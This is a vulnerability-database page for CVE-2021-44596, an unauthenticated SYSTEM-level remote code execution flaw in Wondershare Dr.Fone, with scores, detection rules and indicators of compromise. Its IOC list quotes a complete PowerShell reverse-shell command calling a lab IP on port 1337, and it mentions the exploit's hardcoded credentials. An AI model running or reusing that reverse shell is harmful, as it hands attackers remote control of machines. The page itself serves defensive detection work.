cbcvebase.
CVE-2021-44596
published 2022-04-29

CVE-2021-44596: Wondershare LTD Dr. Fone as of 2021-12-06 version is affected by Remote code execution. Due to software design flaws an unauthenticated user can communicate…

PriorityP180critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
22.72%
97.4th percentile
Wondershare LTD Dr. Fone as of 2021-12-06 version is affected by Remote code execution. Due to software design flaws an unauthenticated user can communicate over UDP with the "InstallAssistService.exe" service(the service is running under SYSTEM privileges) and manipulate it to execute malicious executable without any validation from a remote location and gain SYSTEM privileges

Affected

1 ranges
VendorProductVersion rangeFixed in
wondersharedr.fone

Detection & IOCsextracted from sources · hover to see the quote

filenameInstallAssistService.exe
urlhttps://download.wondershare.net/drfone_full4008.exe
processWindowsPowerShell\v1.0\powershell.exe
commandpowershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.14.129',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
portUDP/1024-65499 (scanned range targeting InstallAssistService.exe)
portTCP/1337 (reverse shell listener)
  • Detect unauthenticated UDP packets sent to InstallAssistService.exe across the full ephemeral port range (1024–65499); the exploit iterates every UDP port scanning for the listening service.
  • Alert on InstallAssistService.exe spawning powershell.exe (especially with -nop flag) as a child process, which indicates successful RCE exploitation.
  • Detect PowerShell reverse-shell pattern: New-Object System.Net.Sockets.TCPClient combined with iex (Invoke-Expression) launched by a SYSTEM-privileged non-interactive service process.
  • The exploit payload embeds hardcoded credentials ('Admin' / '12345') in the UDP message body; inspect UDP payloads to InstallAssistService.exe for credential strings followed by executable paths.
  • Monitor for outbound TCP connections on port 1337 originating from InstallAssistService.exe or its child processes, consistent with the reverse shell callback.
  • ·The exploit targets Wondershare Dr.Fone versions up to 12.0.7; the vulnerable service (InstallAssistService.exe) runs under SYSTEM privileges with no authentication on its UDP interface, making any host running this version remotely exploitable without credentials.
  • ·The exploit proof-of-concept uses example attacker IPs (192.168.14.129 for C2 listener, 192.168.14.137 for target); these are lab-specific and should not be used as static IOCs in production detections.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.